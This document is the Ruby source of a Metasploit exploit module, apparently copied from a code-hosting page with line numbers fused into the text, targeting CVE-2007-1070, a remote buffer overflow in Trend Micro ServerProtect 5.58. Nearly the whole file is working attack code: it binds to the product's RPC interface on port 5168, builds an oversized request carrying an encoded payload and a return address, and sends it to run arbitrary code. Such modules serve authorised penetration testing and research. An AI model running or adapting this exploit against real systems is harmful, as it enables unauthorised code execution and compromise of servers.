Path: blob/master/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb
19535 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::DCERPC910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Trend Micro ServerProtect 5.58 Buffer Overflow',15'Description' => %q{16This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.17By sending a specially crafted RPC request, an attacker could overflow the18buffer and execute arbitrary code.19},20'Author' => [ 'MC' ],21'License' => MSF_LICENSE,22'References' => [23['CVE', '2007-1070'],24['OSVDB', '33042'],25['BID', '22639'],26],27'Privileged' => true,28'DefaultOptions' => {29'EXITFUNC' => 'thread',30},31'Payload' => {32'Space' => 800,33'BadChars' => "\x00",34'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",35},36'Platform' => 'win',37'Targets' => [38[ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x6563124c } ], # CALL EBX - StCommon.dll39],40'DefaultTarget' => 0,41'DisclosureDate' => '2007-02-20',42'Notes' => {43'Reliability' => UNKNOWN_RELIABILITY,44'Stability' => UNKNOWN_STABILITY,45'SideEffects' => UNKNOWN_SIDE_EFFECTS46}47)48)4950register_options([ Opt::RPORT(5168) ])51end5253def exploit54connect55handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])56print_status("Binding to #{handle} ...")5758dcerpc_bind(handle)59print_status("Bound to #{handle} ...")6061filler = payload.encoded + rand_text_english(1600 - payload.encoded.length) + [target.ret].pack('V')6263len = filler.length6465# CMON_NetTestConnection66sploit = NDR.long(0x000a0017) + NDR.long(len) + filler + NDR.long(0)6768print_status("Trying target #{target.name}...")6970begin71dcerpc_call(0, sploit)72rescue Rex::Proto::DCERPC::Exceptions::NoResponse73end7475handler76disconnect77end78end798081